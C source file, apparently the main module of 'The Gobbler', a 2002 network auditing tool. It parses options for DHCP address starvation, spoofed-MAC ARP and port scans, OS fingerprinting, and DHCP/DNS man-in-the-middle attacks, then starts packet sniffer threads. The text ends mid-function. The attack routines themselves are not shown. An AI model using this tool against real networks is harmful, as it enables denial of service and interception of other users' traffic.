/*The Gobbler - A tool to audit DHCP networks
 *Copyright (C) 2002 Steven Jones root@networkpenetration.com
 *www.networkpenetration.com
 *
 *This program is free software; you can redistribute it and/or
 *modify it under the terms of the GNU General Public License
 *as published by the Free Software Foundation; either version 2
 *of the License, or (at your option) any later version.
 *
 *This program is distributed in the hope that it will be useful,
 *but WITHOUT ANY WARRANTY; without even the implied warranty of
 *MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *GNU General Public License for more details.
 *
 *You should have received a copy of the GNU General Public License
 *along with this program; if not, write to the Free Software
 *Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 */

#include "gobbler.h"
#include "nmap.h"
//globals
pthread_mutex_t typelock = PTHREAD_MUTEX_INITIALIZER;
pthread_mutex_t mlock = PTHREAD_MUTEX_INITIALIZER; //mutex lock to ensure different thread deals with each pack
pthread_mutex_t packetlock = PTHREAD_MUTEX_INITIALIZER; //packet lock used to control access to libnet
extern pthread_mutex_t listlock;
static pthread_once_t caddrlock = PTHREAD_ONCE_INIT; //count available addresses from netmask once n only once
static pthread_once_t p_once = PTHREAD_ONCE_INIT; //create key for thread specifc data once n only once
pthread_key_t p_key;  


int arpscanstarted = 0;
int icmpscanstarted = 0;
int dhcpdiscoverstarted = 0;
int dhcpdiscoverservice = 0;
int portscanstarted = 0;
int sniffer = 0;
int dhcpdetected = 0;
int dhcpgobblestarted = 0;
int dhcpgobbling = 0;
int ipgobblecount = 0;
int packid = 0;
int portscan = 0;
int nongportscan = 0;
int dhcpmitm = 0;
int arpcache = 0;
int srcportoption = 0;
int fast = 0;
int noprintinfo = 0;
int dontreplytoping = 0;
int phosts = 0;
int portl = 0;
int ng = 0;
int arprecvcount = 0;
int webserver = 0;
int specarp = 0;
int gobblearp = 0;
int bcastarp = 0;
int subbcastarp = 0;
int wrongarp = 0;
int passivearp = 0;
int mitmlasttype = 0;
int mitmdns = 0;
int mitmother = 0;
int mitmsubnet = 0;
int opentcpport = 0;
int openudpport = 0;
int createhost = 0;
int dhcpreplyinfo = 0;
int displayfiltered = 0;
int displayclosed = 0;
int jumpfilter = 0;
int speccreate = 0;
int gobblecreate = 0;
int gobbleicmp = 0;
int specicmp = 0;
int noicmpping = 0;
int onlyicmpping = 0;
int dontreleaseips = 0;
int warning = 1;
int osdetection = 0;
int pingamount = 0;
int icmpechorec = 0;
int icmpechosent = 0;
int icmptrace = 0;
int targetlocated = 0;
int hopcount = 0;
int exceedmatch = 0;
int suborbroad = 0;
int multicastmac = 0;
int destcount = 0;
int icmplen = 0;
int t1rec = 0; //t1 recieved
int t2rec = 0;
int t3rec = 0;
int t4rec = 0;
int t5rec = 0;
int t6rec = 0;
int t7rec = 0;
int purec = 0;
int packhandlers = 0;
int portzerotest = 0;
extern int maninthemiddlestarted;
extern int mitmgobble;
extern int dhcpreplyinfo;
extern int dhcpmitmstarted;
extern int mitmgivingout;
extern int portscanningstarted;
extern int filterscan;
extern int getdestmacaddr;
extern int icmpport;
extern int start;
extern int osdetect;

//os detection vars
extern int tseq;
extern int tseqreply;
extern int t1;
extern int t1reply;
extern int t1port;
extern int t2;
extern int t2reply;
extern int t2port;
extern int t3;
extern int t3reply;
extern int t3port;
extern int t4;
extern int t4reply;
extern int t4port;
extern int t5;
extern int t5reply;
extern int t5port;
extern int t6;
extern int t6reply;
extern int t6port;
extern int t7;
extern int t7reply;
extern int t7port;
extern int pu;
extern int pureply;
extern u_int16_t puid;
extern u_int16_t udpck;
extern u_int32_t t1seq;
extern u_int32_t t2seq;
extern u_int32_t t3seq;
extern u_int32_t t4seq;
extern u_int32_t t5seq;
extern u_int32_t t6seq;
extern u_int32_t t7seq;
extern u_int16_t patternbyte;
extern int testcounter;
FingerPrint *FPs[10];
FingerPrint **reference_FPs;
int udpclosedport = CLOSEDUDP; //TODO need to scan to see if port is actually closed
//end of os detection vars

//start of port 0 testing vars
FingerPrint *PFPs[10];
FingerPrint **portzero_FPs;
extern int portzerotestcounter;
extern int p1;
extern int p1reply;
extern int p1src;
extern int p1dst;
extern int p2;
extern int p2reply;
extern int p2src;
extern int p2dst;
extern int p3;
extern int p3reply;
extern int p3src;
extern int p3dst;
extern int p4;
extern int p4reply;
extern int p4src;
extern int p4dst;
extern int p5;
extern int p5reply;
extern int p5src;
extern int p5dst;
extern u_int16_t p5id;
extern int p6;
extern int p6reply;
extern int p6src;
extern int p6dst;
extern u_int16_t p6id;
extern int p7;
extern int p7reply;
extern int p7src;
extern int p7dst;
extern u_int16_t p7id;

int p1rec;
int p2rec;
int p3rec;
int p4rec;
int p5rec;
int p6rec;
int p7rec;
//end of port 0 testing vars

u_int16_t srcprt = 0;
u_int endwait = 0;
u_int32_t maskcount = 0;
u_int32_t tracktran = 0;

char *nongsrcip;
char *nongsrcmac;
char *portlist;
u_char *hostname;
char *addrs;

libnet_t *l;
libnet_t *q;
port *portpoint;
cport *cportpoint;
fport *fportpoint;
fport *fportendpoint;
ffport *ffportpoint;
macip *macippoint;
macip *macipendpoint;
mt *mtpoint;
mt *mtendpoint;
pt *ptpoint;
pt *ptendpoint;
rp *rppoint;
rp *rpendpoint;
udpport *portudppoint;
cudpport *portcudppoint;
struct timeval scantime;

//prototypes
static void p_destructor(void *ptr);
void startdhcpdiscover(void);

int bpffd;

#ifdef LINUX
extern int MTU1;
#define PACKET_HOLDER_SIZE 65536+14
#endif

#ifdef OSXOS
extern int MTU1;
#endif

#define GOB_WIN_SIZE 0 //0x5B4 commador 64 

//get rid of these globals
//defualts for network
u_int8_t subneta = 0, subnetb = 0, subnetc = 0, subnetd = 0, gatewaya = 0, gatewayb = 0, gatewayc = 0, gatewayd = 0;


int main(int argc, char *argv[])
{
	void startdhcpgobble(void);
	void startsniffer(void);
	void startarpscan(void);
	void startlibnet(void);
	void startportscan(void);
	void startdhcpmitm(void);
	void startcreatehost(void);
	void egg(void);
	int parseaddrs(void);
	extern FingerPrint **parse_fingerprint_reference_file(void); 
	extern FingerPrint **parse_portzero_reference_file(void); 
	struct in_addr sa;

	int c = 0;
	int gobble = 0;
	int arpscan = 0;
	int mitm = 0;
	int argcount =0;
	int ewaitflag = 0;
	int randmac = 0;
	int nonspoofedmac = 0;
	int k = 0;
	int f = 0;
	int t = 0;
	int n = 0;
	int ipforarp = 0;
	int ipforcreate = 0;
	int ipforicmp = 0;
	long l = 0;
	int addrabc = 0;
	char *p;
	char *b;
	char *cp;
	struct ether_addr *eaddr;
	eth_t *e;
	mtnode mt;
	extern struct ether_addr * get_hwaddr(const u_char *device);
	

	if((gettimeofday(&inittime,NULL)) != 0){
		printf("Opps: gettimeofday error\n");
		exit(1);
	}
	
	//printf("%d\n", (unsigned int)inittime.tv_sec);
	srand((unsigned int)inittime.tv_sec);


	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	signal(SIGKILL, cleanup);
	
	//printf("path to services %s\n", _PATH_SERVICES);
	printf("\nThe Gobbler (Alpha release 2.0.1) from NetworkPenetration.com\n");
	printf("-------------------------------------------------------------\n");
	
	if((getuid()!=0)&&geteuid()!=0){
		printf("\nOpps: You need to be root or use sudo\n\n");
		exit(1);
	}

	startlibnet(); //seeds random number for rand mac 
	opterr = 0;
	while((c=getopt(argc, argv, "A:C:DGP:M:N:O:Q:R:STUVXZa:cde:fghi:jl:n:o:rs:tu:vwz:")) != -1){
		switch(c){
			
			case 'a': pingamount = atoi(optarg);
				  break;

			case 'A': if(strncasecmp(optarg, "b", sizeof(char)) == 0){
					  bcastarp = 1;
				  }
				  else if(strncasecmp(optarg, "n", sizeof(char)) == 0){
					  subbcastarp = 1;
				  }
				  else if(strncasecmp(optarg, "g", sizeof(char)) == 0){
					  gobblearp = 1;
				  }
				  else if(strncasecmp(optarg, "p", sizeof(char)) == 0){
					  passivearp = 1;
				  }
				  else if(strncasecmp(optarg, "s", sizeof(char)) == 0){
					  specarp = 1;
				  }
				  else if(strncasecmp(optarg,"w", sizeof(char)) == 0){
					  wrongarp = 1;
				  }
				  
				  else {
					  printf("Opps: Please specify either b, g, n, s or w for arp scan source IP type\n\n");
					  exit(1);
				  }
				  arpscan = 1;
			  	  argcount++;
				  break;
				  
			case 'C': if(strncasecmp(optarg, "g", sizeof(char)) == 0){
					  gobblecreate = 1;
				  }
				  else if(strncasecmp(optarg, "s", sizeof(char)) == 0){
					  speccreate = 1;
				  }
				  else{
					  printf("Opps: Please specify either g or s for type of host to create\n\n");
					  exit(1);
				  }
				  
				  createhost = 1;
				  argcount++;
				  break;

			case 'c': displayclosed = 1;
				  break;
				  
			case 'D': dhcpdiscoverservice = 1;
				  argcount++;
				  break;

			case 'd': displayfiltered = 1;
				  break;
				  
			case 'e': endwait = atoi(optarg);
				  ewaitflag = 1;
				  break;
				  
			case 'f': fast = 1;
				  break;

			case 'h': noicmpping = 1;
				  break;
				  
			case 'g': dontreleaseips = 1;
				  break;
  
			case 'G': gobble = 1;
				  argcount++;
				  break;
			
			case 'i': device = optarg; //pcap device
				  break;
				  
			case 'j': jumpfilter = 1;
				  break;
				  
			case 'l': icmplen = atoi(optarg);
				  if(icmplen > 1472){
					printf("Opps: icmp length to large.... 1472 maximum\n\n");
					exit(1); 
				  }
				  break;

			case 'M': if(strncasecmp(optarg, "l", sizeof(char)) == 0){
					  mitmsubnet = 1; //mitm using this subnet
				  }
				  else if(strncasecmp(optarg, "d", sizeof(char)) == 0){
					  mitmdns = 1; //dns mitm
				  }
				  else if(strncasecmp(optarg, "o", sizeof(char)) == 0){
					  mitmother = 1; //other subnet
				  }
				  else {
					  printf("Opps: Please specify either l, d, o for man in the middle attack type \n\n");
					  exit(1);
				  }
				  mitm = 1;
				  argcount++;
				  if(mitmother){
					  printf("Opps: only leaving subnet -M l or dns -M d\n\n");
					  exit(1);
				  }

				  if(mitmsubnet){
					  if(!warning){
						printf("WARNING alpha testing for start of leaving subnet mitm attack WARNING\n");
					  	sleep(1);
					  	printf("only gobbles 4 ips and dishes one out.... no more no less\n");
					   }
				  }
				 
				  if(mitmdns){
					if(!warning){  
						printf("WARNING alpha testing for start of DNS mitm attack WARNING\n");
						  sleep(1);
						  printf("only gobbles 3 ips and dishes one out.... no more no less\n");
					}
				  }
				  if(!warning){
					  printf("mitm will continue in 5 seconds\nctrl+c to quit\n");
					  sleep(5);
				  }
				  
				  break;
	
			case 'n': phosts = atoi(optarg); 
				  if(phosts>MAXIPSOURCE){
					  printf("Opps: Number of source hosts has to be below %d\n\n", MAXIPSOURCE);
					  exit(1);
				  }
				  break;
				  
			case 'N': nongportscan = 1;
				  argcount++;
				  hostname = (u_char *) optarg;
				  break;
			
			case 'o': opentcpport = atoi(optarg);
				  break;

			case 'O': openudpport = atoi(optarg);
				  break;

			case 'P': portscan = 1;
				  argcount++;
				  hostname = (u_char *) optarg;
				  break;
			
			case 'Q': randmac = 0;
				  nonspoofedmac = 0;
				  multicastmac = 0;
				  ng++;
				  if(!(cp = strrchr(optarg, '-'))){
					  printf("Opps: You need to specify a mac address for the source IP address\n\n");
					  exit(1);
				  }
				  *cp++ = 0;
				  
				  if(strncasecmp(cp, "R", sizeof(char)) == 0){
				  	//printf("u do rand rand rand, u do rand rand\n");
					randmac = 1;
				  }
				  else if(strncasecmp(cp, "N", sizeof(char)) == 0){
					nonspoofedmac = 1;
				  }
				  else if(strncasecmp(cp, "M", sizeof(char)) == 0){
					multicastmac = 1;
				  }
				  else {
				
					p = cp;
					f =0;
						
					//check mac address
					while(((t = isxdigit(*p)) != 0)  && f<=12){
						p++;
						if((f == 1) || (f == 3) || (f == 5) || (f == 7) || (f == 9)){
							p++;
						}
						f++;
					}
					if((t != 0) || f<12){
						printf("Opps: Invalid mac address %s\n", cp);
						exit(1);
					}
					
					for(n = 0; n< ETH_ADDR_LEN; n++){
						//l = 0;
						l = strtol((char *)cp, &b, 16);
						if(b == (char *)cp || l <0 || l > 0xff){
							printf("Opps: strol error1\n");
							exit(1);
						}
						if(n < 5 && *b != ':'){
							printf("Opps: strol error2\n");
							exit(1);
						}
						//printf("l = %x\n", (u_char)l);
						mt.srcmac[n] = (u_char)l;
						cp = b + 1;
					}
				  }

				  if(randmac && nonspoofedmac){
					  printf("Opps: Please select either R/r or N/n\n\n");
					  exit(1);
				  }
				  if(randmac || multicastmac){
					  for(k=0;k<6;k++){
						if(multicastmac){
							if(k == 0) mt.srcmac[k] = 0x01;
						}
						if(randmac){
							if(k == 0) mt.srcmac[k] = 0x0;
						}
						if(k != 0) mt.srcmac[k] = libnet_get_prand(LIBNET_PR8);

						if(tag){
							if(k==4) mt.srcmac[k] = (u_int8_t)'N';
							if(k==5) mt.srcmac[k] = (u_int8_t)'P';
						}
					  }
					  if(v>2)printf("Src mac = %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", mt.srcmac[0], mt.srcmac[1], mt.srcmac[2], mt.srcmac[3], mt.srcmac[4], mt.srcmac[5]);
				  }

				  if(nonspoofedmac){
					  
					  if(device == NULL){
						  printf("Opps: device = NULL\n\nYou need to select a interface and tagging (if required) before using -Q with a non spoofed mac address\nFor example -i eth0 -T -Q 1.2.3.4:n (NOT -Q1.2.3.4:n -i eth0 -T) (Need to fix, sorry)\n");
						  exit(1);
					  }
					  
					  //check interface is good
					  e = eth_open(device);
					  if(e == NULL){
						  printf("Opps: eth_open error\n");
						  exit(1);
					  }
					  eth_close(e);
					  eaddr = get_hwaddr((u_char *)device);
					  if(eaddr == NULL){
						printf("Opps: couldn't get hwaddr\n\n");
						exit(1);
					  }
					  printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", eaddr->ether_addr_octet[0], eaddr->ether_addr_octet[1],eaddr->ether_addr_octet[2],eaddr->ether_addr_octet[3],eaddr->ether_addr_octet[4],eaddr->ether_addr_octet[5]);

					  
					  memcpy(&mt.srcmac, eaddr->ether_addr_octet, ETH_ADDR_LEN);
					  if(tag){
						  mt.srcmac[4] = (u_int8_t)'N';
						  mt.srcmac[5] = (u_int8_t)'P';
					  }
				  
				  	  if(v>2)printf("Src mac = %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", mt.srcmac[0], mt.srcmac[1], mt.srcmac[2], mt.srcmac[3], mt.srcmac[4], mt.srcmac[5]);
				  }
					
				  if(!inet_aton(optarg, &sa)){
					  printf("Opps: Invalid IP address %s\n\n",optarg);
					  exit(1);
				  }

				  mt.dhcptype = 0;
				  mt.transid = 0;
				  mt.serverip[0] = 0;
				  mt.serverip[1] = 0;
				  mt.serverip[2] = 0;
				  mt.serverip[3] = 0;
				  mt.ipaddress = sa.s_addr;
				  addll(mt);				  
				  ipforarp = 1;	
				  ipforcreate = 1;
				  ipforicmp = 1;
				  break;
 	
			case 'R': portlist = optarg;
				  portl = 1;
				  break;				  

			case 'r': dontreplytoping = 1;
				  break;
			
 			case 's': srcprt = atoi(optarg);
				  srcportoption = 1;
				  break;
			

			case 'S': sniffer = 1;
				  argcount++;
				  break;

			case 'T': icmptrace = 1;
				  break;

			case 't': tag = 1;
				  break;
			
			case 'u': udpclosedport = atoi(optarg);
				  break;
				  
			case 'U': onlyicmpping = 1;
				  portlist = NULL;
				  break;
					

			case 'v': v++;
				  break;
	
			case 'V': vll++;
				  break;

			case 'w': warning = 0;
				  break;
			
			case 'X': osdetection = 1;
				  break;

			case 'z': addrs = (char *)optarg;
				  addrabc = 1;
				  break;
		
			case 'Z': portzerotest = 1;
				  break;
					  
			case '?': usage();
				  exit(0);

			default : usage();
				  exit(0);
		}
	}
	if(v == EASTEREGG){
		egg();
		exit(0);
	}
	if(!argcount){
		usage();
	}
	
	//check various args
	if(device == NULL){
		printf("Opps: you need to specify a interface\n");
		exit(1);
	}
	if(addrabc == 1){
		printf("number of IPs = %d\n",parseaddrs());
		exit(1);
	}
	if(argcount > 1){
		printf("Opps: Please select only one scan option\n\n");
		exit(1);
	}
	
	if(gobble && portl){
		printf("Opps: you selected gobble and a port range.... you probably meant (P)ortscan instead of (G)obble\n\n");
		exit(1);
	}

	if(portlist && ((!portscan) && (!nongportscan))){
		printf("Opps: port list is pointless without -P or -N\n\n");
		exit(1);
	}
	if(((!portlist) && (!onlyicmpping)) && (!icmptrace) && portscan){
		printf("Opps: please select either port range -R, ping -U or traceroute -T\n\n");
		exit(1);
	}
	
	if((nongportscan) && ((!ng) || ((!portlist) && (!onlyicmpping) &&(!icmptrace)))){
		printf("Opps: please select a source IP address and source MAC address with -Q and either a port range (-R) or ping (-U) or traceroute (-T)\n\n");
		exit(1);
	}
	
	if(v > 3){
		printf("Opps: Too many -v's on command line\n\n");
		exit(1);
	}

	if(specarp && !ipforarp){
		printf("Opps: you need to specify a ip address and mac for specified arp scan (use -Q)\n\n");
		exit(1);
	}
	
	if(srcportoption && osdetection){
		printf("Opps: OS detection needs to use random source ports.... please remove the -s option\n\n");
		exit(1);
	}

	if(icmptrace && onlyicmpping){
		printf("Opps: please select traceroute (-T) or ping (-U).... not both\n\n");
		exit(1);
	}

	if(speccreate && !ipforcreate){
		printf("Opps: you need to sepcify a ip address and mac for creating a specified host (use -Q)\n\n");
		exit(1);
	}

	if(ipforarp && (gobblearp || bcastarp)){
		printf("Opps: you specified an ip address for a gobbled scan... plz remove the -Q\n\n");
		exit(1);
	}
	
	if(ipforcreate && phosts){
		printf("Opps: you specified an ip address and a number of gobbled hosts to create.... remove the -n or -Q\n\n");
		exit(1);
	}

	if(ipforcreate && gobblecreate){
		printf("Opps: you specified an ip address for gobbled create.... remove the -Q\n\n");
		exit(1);
	}

	if(ipforicmp && gobbleicmp){
		printf("Opps: you specified an ip address for icmp gobble scan.... remove the -Q\n\n");
		exit(1);
	}
	
	if(portl && onlyicmpping){
		printf("Opps: you selected a port range and only icmp ping, please remove the -U or the -R\n\n");
		exit(1);
	}

	if(onlyicmpping && noicmpping){
		printf("Opps: you selected onlyicmpping and noicmpping plz remove one of them\n\n");
		exit(1);
	}
	
	if(phosts && speccreate){
		printf("Opps: you specified -n with a specified create.... please remove the -n\n\n");
		exit(1);
	}
	
	if(v && tag) printf("Tagging mac address with 4e:50\n");
	
	if(!ewaitflag)endwait = 2; //default wait time
	if(!icmplen) icmplen = 32; //default icmp length	

	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	signal(SIGQUIT, cleanup);

	if(createhost){
		startsniffer();
		startcreatehost();
	}
	
	if(dhcpdiscoverservice){
		dhcpdetected = 0; //init to 
		startsniffer();
		startdhcpdiscover();
	}
	
	if(gobble){
		startsniffer();
		startdhcpgobble();
	}
	
	if(arpscan){
		startsniffer();
		startarpscan();
	}
	
	if(portscan){
		if(osdetection && !icmptrace && !onlyicmpping)
			reference_FPs = parse_fingerprint_reference_file();
		
		if(portzerotest && !icmptrace && !onlyicmpping)
			portzero_FPs = parse_portzero_reference_file();
		
		if(!phosts) phosts = 1; //default to 1 gobbled host if non specified
		//parseaddrs();
		startsniffer();
		startportscan();	
	}
	
	if(nongportscan){
		if(osdetection && !icmptrace && !onlyicmpping)
			reference_FPs = parse_fingerprint_reference_file();

		if(portzerotest && !icmptrace && !onlyicmpping)
			portzero_FPs = parse_portzero_reference_file();
		//parseaddrs();
		startsniffer();
		startportscan();
	}
	
	if(mitm){
		startsniffer();
		startdhcpmitm();
	}
	
	if(sniffer){
		startsniffer();
		//TODO parse BPF filter from command line
	}

	for(;;) pause(); //everything handled by threads from now on
}


int parseaddrs(void)
{
	//build linked list of targets
	//bits stolen from scanrand (doxpara.com) cheers dan
	unsigned int convert32(char *, int, int, int , int); 
	int addip(u_int32_t ipaddr);
	char al[1024], bl[1024], cl[1024], dl[1024];
	u_short sa, ea, sb, eb, sc, ec, sd, ed;
	libnet_plist_t alis, blis, clis, dlis, *alist, *blist, *clist, *dlist;
	u_int8_t target[4]; //just the right size for a 32bit ip address ;)
	u_char *aptr; 
	int z,zz,x,xx,w,ww,y,yy;
	int count;
	
	if(v>1)printf("parse addrs\n");
	if(v>1)printf("addrs %s\n\n",addrs);

	alist = blist = clist = dlist = NULL;
	destcount = count = z = zz = x = xx = w = ww = y = yy = sa = ea = sb = eb = sc = ec = sd = ed = 0;

	if(sscanf(addrs, "%1024[^.].%1024[^.].%1024[^.].%1024s", al,bl,cl,dl) != 4){
		printf("Opps: sscanf failed parsing targets....exiting\n\n");
		exit(1);
	}
	
	alist = &alis;
	blist = &blis;
	clist = &clis;
	dlist = &dlis;

	if(libnet_plist_chain_new(l, &alist, al) == -1){
		printf("Opps: plist_chain_new error as %s\n", libnet_geterror(l));
		exit(1);
	}
	while(libnet_plist_chain_next_pair(alist, &sa, &ea)){
		if(libnet_plist_chain_new(l, &blist, bl) == -1){
			printf("Opps: plist_chain_new error as %s\n", libnet_geterror(l));
			exit(1);
		}
		while(libnet_plist_chain_next_pair(blist, &sb, &eb)){
			if(libnet_plist_chain_new(l, &clist, cl) == -1){
				printf("Opps: plist_chain_new error as %s\n", libnet_geterror(l));
				exit(1);
			}
		 	while(libnet_plist_chain_next_pair(clist, &sc, &ec)){
				if(libnet_plist_chain_new(l, &dlist, dl) == -1){
					printf("Opps: plist_chain_new error as %s\n", libnet_geterror(l));
					exit(1);
				}
				while(libnet_plist_chain_next_pair(dlist, &sd, &ed)){
					if(sa >= 255) sa = 0xff;
					if(ea >= 255) ea = 0xff;
					if(sb >= 255) sb = 0xff;
					if(eb >= 255) eb = 0xff;
					if(sc >= 255) sc = 0xff;
					if(ec >= 255) ec = 0xff;
					if(sd >= 255) sd = 0xff;
					if(ed >= 255) ed = 0xff;
					target[0] = sa;
					target[1] = sb;
					target[2] = sc;
					target[3] = sd;


					for(target[0]=sa; (target[0]<=ea && w != 1); target[0]++){
						z = x = y = 0; //reset loop counts
						for(target[1]=sb; (target[1]<=eb && x != 1); target[1]++){
							z = y = 0; //reset loop counts
							for(target[2]=sc; (target[2]<=ec && y != 1); target[2]++){
								z = 0; //reset loop counter
								for(target[3]=sd; (target[3]<=ed && z != 1); target[3]++){
									aptr = target;
									//printf("%d.%d.%d.%d %u 0x%x\n",target[0],target[1],target[2],target[3], (u_int32_t)convert32(aptr, 0, 1, 2, 3), (u_int32_t)convert32(aptr,0,1,2,3));
									
									if(target[3] == 255) z = 1;
									if(target[2] == 255) y = 1;
									if(target[1] == 255) x = 1;
									if(target[0] == 255) w = 1;
									addip(convert32(aptr,0,1,2,3));
									count++;
								}
							}
						}
					}
				}
			}
		}
	}

	if(libnet_plist_chain_free(alist) == -1){
		printf("Opps: libnet_plist_chain_free error\n\n");
		exit(1);
	}
	
	if(libnet_plist_chain_free(blist) == -1){
                printf("Opps: libnet_plist_chain_free error\n\n");
                exit(1);
        }
	
	if(libnet_plist_chain_free(clist) == -1){
                printf("Opps: libnet_plist_chain_free error\n\n");
                exit(1);
        }
	
	if(libnet_plist_chain_free(dlist) == -1){
                printf("Opps: libnet_plist_chain_free error\n\n");
                exit(1);
        }
	destcount = count;
	if(v>1)printf("Dest/target IP count = %d\n", destcount);
	return(count);
}

void startsniffer(void)
{
	void thread_packhandle(int);
	extern int pcap_lookupnet(char *, u_int32_t *,u_int32_t *, char *);
	char errbuf[PCAP_ERRBUF_SIZE], str1[INET_ADDRSTRLEN], str2[INET_ADDRSTRLEN];
	static void doaddresses_once(void);
	int i;

	extern int open_interface(void);
	
	tptr = calloc(MAXPACKHANDLER, sizeof(Thread));

	
	//lock threads from processing packets
	pthread_mutex_lock(&mlock);
	
	bpffd = open_interface(); //open interface different for each OS see packet_*.c
	
	if(pcap_lookupnet(device, &localnet, &netmask, errbuf) <0){
                printf("Opps: pcap_lookupnet error as %s\n", errbuf);
                exit(1);
        }	
        if(v>1){
                printf("Localnet: %s\nSubnet mask: %s\n", inet_ntop(AF_INET, &localnet, str1, sizeof(str1)), inet_ntop(AF_INET, &netmask, str2, sizeof(str2)));
        }
        pthread_once(&caddrlock, doaddresses_once);


	for(i = 0; i < MAXPACKHANDLER; i++){
		thread_packhandle(i);
		packhandlers++;
	}
	
	//allow threads to process packets
	pthread_mutex_unlock(&mlock);
}


void startlibnet(void)
{
	//initialise once 
	char errbuf[LIBNET_ERRBUF_SIZE];
	char errbuff[LIBNET_ERRBUF_SIZE];

	if((l = libnet_init(LIBNET_LINK, device, errbuf)) == NULL){
		printf("Opps: libnet_init error as %s\n", errbuf);
		exit(1);
	}
	
	if((q = libnet_init(LIBNET_LINK_ADV, device, errbuff)) == NULL){
		printf("Opps: libnet_init error as %s\n", errbuff);
		exit(1);
	}

	if(libnet_seed_prand(l) <0){
		printf("Couldn't seed the random generator\n");
		exit(1);
	}
	
	if(libnet_seed_prand(q) <0){
		printf("Couldn't seed the random generator\n");
		exit(1);
	}
}

void thread_packhandle(int i)
{
	void *packhandler(void *);
	if(pthread_create(&tptr[i].thread_tid, NULL, &packhandler, (void *) i) < 0){
		printf("Opps: pthread_create error\n");
		exit(1);
	}
}


void* packhandler(void *tnum)
{ 	
	void next_pcap(int);

	if(pthread_detach(pthread_self()) <0){
		printf("Opps: pthread_detach error\n");
		pthread_exit(&status);
	}

	if(v>2) printf("Packet handler started on thread(%ld)\n", (long int) pthread_self());
	next_pcap((int)tnum); //main sniffing loop
	pthread_exit(&status);	

}

void next_pcap(int tnum)
{
	Packet *tsd; //thread data
	static void getpacket_once(void);
	int bufsize1, cc;
	struct timeval tv;
	int numfds;
	void processpacket(void);
	u_char *buf1;
	#ifndef OSXOS //ifdef BSDOS || OSXOS
	struct pollfd pds[1];
	#endif

	#ifndef LINUX //ifdef BSDOS || OSXOS
	#define bhp ((struct bpf_hdr *)bp)
	u_char *bp, *ep;
	#endif

	#ifdef OSXOS
	fd_set set;
	int result;
	struct timeval timeout;
	#endif
	
	#ifndef OSXOS //ifdef LINUX || BSDOS
	pds[0].fd=bpffd;
	pds[0].events=POLLIN;
	pds[0].revents=0;
	#endif
        
	/*Get the sizes of the buffers*/
	#ifndef LINUX //ifdef BSDOS || OSXOS
        if (ioctl(bpffd, BIOCGBLEN, (caddr_t) & bufsize1) < 0) {
                printf("Opps: BIOCGBLEN error as %s", strerror(errno));
		exit(1);
        }
	#endif

	#ifdef LINUX
	bufsize1=MTU1;
        if ((bufsize1 <= 0) || (bufsize1 >= 65536)) bufsize1=65536;
	#endif

        if(v>1) printf("Network buffer size is %i\n",bufsize1);
        buf1 = (u_char *) malloc((unsigned) bufsize1);
        if (buf1 == 0) {
                printf("Opps: malloc error as %s", strerror(errno));
		exit(1);
        }


	//create key
	if(pthread_once(&p_once, getpacket_once) !=0){
		printf("Opps: pthread_once error\n");
		exit(1);
	}

	//if no tsd make some space
	if((tsd = pthread_getspecific(p_key)) == NULL){
		tsd = calloc(1, sizeof(Packet)); //init to 0
		if(tsd == NULL){
			printf("Opps: Calloc error\n");
			exit(1);
		}
		if(pthread_setspecific(p_key, tsd) != 0){
			printf("Opps: pthread_setspecific error\n");
			exit(1);
		}
	}
	
	#ifdef BSDOS
	while (1){
                tv.tv_sec=1;
                tv.tv_usec=0;
                numfds=poll(pds, 1, -1);
                if (numfds>0){
			if((pds[0].revents & POLLIN)== POLLIN ){
                                if(v>1)printf("Got packet on interface\n");
                                again:
                                	bzero(buf1,bufsize1);
					cc = read(pds[0].fd, (char *) buf1, bufsize1);
                                        if(v>1)printf("Read %i bytes from the bpf\n",cc);
                                        /* Don't choke when we get ptraced */
                                        if (cc < 0 && errno == EINTR)
                                                goto again;
                                        if (cc < 0) {
                                                if (errno == EINVAL &&
                                                (lseek(pds[0].fd, 0, SEEK_CUR) + bufsize1) < 0) {
                                                        (void) lseek(pds[0].fd, 0, 0);
                      					goto again;
                        			}
                        			printf("Opps: read error as %s", strerror(errno));
                        			cleanup(0);        
					}
                                        /* Loop through the packet(s) */
                                        bp = buf1;
                                        ep = bp + cc;
					
                                        while (bp < ep) {
                                                register int caplen, hdrlen;
                                                caplen = bhp->bh_caplen;
                                                hdrlen = bhp->bh_hdrlen;
						memcpy(tsd->pkt, bp+18, caplen);
						bp += BPF_WORDALIGN(hdrlen + caplen);
						tsd->ppkt = tsd->pkt;
						tsd->caplen = caplen;
						
						
						tptr[(int)tnum].thread_count++;

						if(v>1)printf("<<<<Captured %d of %d bytes by thread %d (tid %ld) total for thread %ld>>>>\n", caplen, hdrlen, tnum, (long int)tptr[tnum].thread_tid, tptr[tnum].thread_count);
						processpacket(); //packet stored in tsd
				}
			}
		}
	}
	#endif

	#ifdef LINUX
	while(1){
                tv.tv_sec=1;
                tv.tv_usec=0;
                numfds=poll(pds, 1,1);

                if(numfds>0){
                	if((pds[0].revents & POLLIN)== POLLIN ){
                                bzero(&tsd->pkt, sizeof(tsd->pkt));
                                cc = read(pds[0].fd, (char *) tsd->pkt, PACKET_HOLDER_SIZE);
				tsd->ppkt = tsd->pkt;
                                tsd->caplen = cc;
                                //printf("Read %i bytes from the socket\n",cc);
                                //printf("packet_len is %u\n",tsd->caplen);
				tptr[(int)tnum].thread_count++;
				if(v>1)printf("<<<<Captured %d bytes by thread %d (tid %ld) total for thread %ld>>>>\n", cc, tnum, (long int)tptr[tnum].thread_tid, tptr[tnum].thread_count);
                                processpacket();
                        }
                }
        }
	#endif

	#ifdef OSXOS
	while(1){
		timeout.tv_sec = 0;
		timeout.tv_usec = 200;
		
		FD_ZERO(&set);
		FD_SET(bpffd, &set);

		//TRY CHANGING bpffd+1 to just bpffd if select doesn't work
		result = select(bpffd+1, &set, NULL, NULL, &timeout);
		if(result){
			if(FD_ISSET(bpffd, &set)){
				again:
                               	bzero(buf1,bufsize1);
				cc= read(bpffd, (char *)buf1, bufsize1);
				if(cc=0){
					//XXX This is maybe wrong.... no way of testing as i have no Mac
					printf("Opps: possible read error\n\n");
					exit(1);
				}
				
				//don;t choke on ptrace
